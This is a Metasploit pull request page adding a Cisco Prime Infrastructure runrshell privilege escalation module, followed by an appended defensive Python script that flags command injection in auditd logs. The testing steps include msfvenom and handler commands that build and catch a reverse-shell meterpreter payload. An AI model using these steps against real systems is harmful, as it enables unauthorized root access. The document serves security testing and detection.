Add Privilege Escalation Module for Cisco Prime Infrastructure's runrshell Executable #11960

Merged
merged 3 commits into from Jun 19, 2019

3 participants
@wchen-r7
Contributor

commented Jun 10, 2019

Description

This module exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit. I also saw this being used again in Steven Seeley's CPI HealthMonitor exploit's writeup.

Vulnerable Setup

Cisco Prime Infrastructure 3.4.0 (or prior) is needed, and make sure you have the following to set up the VM image:

  • 4 CPU cores.
  • 12288 MB of RAM (12 GB)
  • 350 GB of hard drive space

Testing

  • Log into the shell on the VM, and execute /opt/CSCOlumos/bin/getSCPcredentials.sh to generate a credential for scp
  • Generate a payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o /tmp/payload.bin
  • scp the payload to CPI
  • In msfconsole, start a handler: handler -p linux/x86/meterpreter/reverse_tcp -H 0.0.0.0 -P 4444, and get a shell.
  • run linux/local/cpi_runrshell_priv_esc. You should get a session, and guid should show as uid=0, gid=0, euid=0, egid=0
@jrobles-r7
Contributor

left a comment

LGTM

@wchen-r7 wchen-r7 self-assigned this Jun 19, 2019

@wchen-r7 wchen-r7 merged commit caa9987 into rapid7:master Jun 19, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Jun 19, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 19, 2019

@wchen-r7

Contributor Author

commented Jun 19, 2019

Release Notes

The Cisco Prime Infrastructure Runshell Privilege Escalation module exploits a vulnerability in the runrshell binary. The runrshell binary is intended to execute a shell script as root, but you can abuse it to inject extra commands in the argument and execute anything as root.

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 26, 2019
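
For defenders, the argument injection described in the release notes above can be hunted for in auditd EXECVE records. The following is an added example, not code from this pull request or from Metasploit; the log lines are constructed, and `/PLACEHOLDER/` stands in for the runrshell install path, which this page does not give.

```python
import re

# Characters a shell treats as command separators, pipes, redirection or substitution.
SHELL_META = re.compile(r"[;&|`$<>\n]")
# aN="plain" or aN=HEX (auditd hex-encodes arguments containing spaces, quotes, etc.)
ARG = re.compile(r'\ba(\d+)=("([^"]*)"|[0-9A-Fa-f]+)')

# Constructed sample records; the runrshell path is a placeholder.
SAMPLE = [
    'type=EXECVE msg=audit(1560000000.101:501): argc=2 '
    'a0="/PLACEHOLDER/runrshell" a1="report.sh"',
    'type=EXECVE msg=audit(1560000000.202:502): argc=2 '
    'a0="/PLACEHOLDER/runrshell" a1=' + b"report.sh; id".hex().upper(),
    'type=EXECVE msg=audit(1560000000.303:503): argc=2 a0="/bin/ls" a1="-l"',
]


def decode_args(record):
    """Return argv from one EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, raw, quoted in ARG.findall(record):
        if raw.startswith('"'):
            args[int(idx)] = quoted
            continue
        try:
            args[int(idx)] = bytes.fromhex(raw).decode("utf-8", "replace")
        except ValueError:  # odd-length value: keep as logged
            args[int(idx)] = raw
    return [args[i] for i in sorted(args)]


def suspicious_runrshell(lines):
    """Return (binary, offending_args) for runrshell executions whose
    arguments contain shell metacharacters."""
    hits = []
    for line in lines:
        if "type=EXECVE" not in line:
            continue
        argv = decode_args(line)
        if not argv or argv[0].rsplit("/", 1)[-1] != "runrshell":
            continue
        bad = [a for a in argv[1:] if SHELL_META.search(a)]
        if bad:
            hits.append((argv[0], bad))
    return hits


if __name__ == "__main__":
    for binary, bad in suspicious_runrshell(SAMPLE):
        print(f"ALERT {binary}: {bad}")
```

Matching on the decoded value matters here: an argument with a space or quote is logged only in hex, so a plain-text search for `;` in the raw audit log would miss it.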
